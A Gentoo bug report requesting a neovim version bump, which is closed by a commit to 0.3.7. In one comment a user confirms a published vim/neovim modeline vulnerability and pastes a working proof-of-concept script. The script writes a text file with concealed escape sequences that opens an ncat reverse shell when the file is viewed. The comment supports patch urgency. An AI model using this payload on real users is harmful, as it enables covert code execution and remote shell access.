Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 686400 - app-editors/neovim-0.3.5 version bump
Summary: app-editors/neovim-0.3.5 version bump
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: Current packages (show other bugs)
Hardware: All Linux
: Normal normal (vote)
Assignee: Vim Maintainers
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2019-05-20 15:43 UTC by rwb72518
Modified: 2019-06-13 02:25 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description rwb72518 2019-05-20 15:43:27 UTC
The latest stable release is 0.3.5
https://github.com/neovim/neovim/releases/tag/stable

Reproducible: Always
Comment 1 Michael Cook 2019-06-04 18:56:48 UTC
Would be nice to get a bump sooner rather than later https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
Comment 2 Guido Kroon 2019-06-05 16:36:56 UTC
(In reply to Michael Cook from comment #1)
> Would be nice to get a bump sooner rather than later
> https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-
> neovim.md

PoC checks out - I can pop a shell on my box:

```
#!/usr/bin/env python3
with open('shell.txt', 'w') as out:
    print(""" \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup ncat 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n """, file=out)
```

Above script relies on `ncat` instead of `nc`, as my `nc` doesn't support `-e`.
Comment 3 Larry the Git Cow gentoo-dev 2019-06-13 02:25:07 UTC
The bug has been closed via the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=0e3eafdc9aab9c55badf38754e59acd7cf8aaa3f

commit 0e3eafdc9aab9c55badf38754e59acd7cf8aaa3f
Author:     Tim Harder <radhermit@gentoo.org>
AuthorDate: 2019-06-13 02:20:23 +0000
Commit:     Tim Harder <radhermit@gentoo.org>
CommitDate: 2019-06-13 02:24:02 +0000

    app-editors/neovim: version bump to 0.3.7
    
    Closes: https://bugs.gentoo.org/686400
    Closes: https://bugs.gentoo.org/685162
    
    Signed-off-by: Tim Harder <radhermit@gentoo.org>

 app-editors/neovim/Manifest            |  1 +
 app-editors/neovim/neovim-0.3.7.ebuild | 96 ++++++++++++++++++++++++++++++++++
 2 files changed, 97 insertions(+)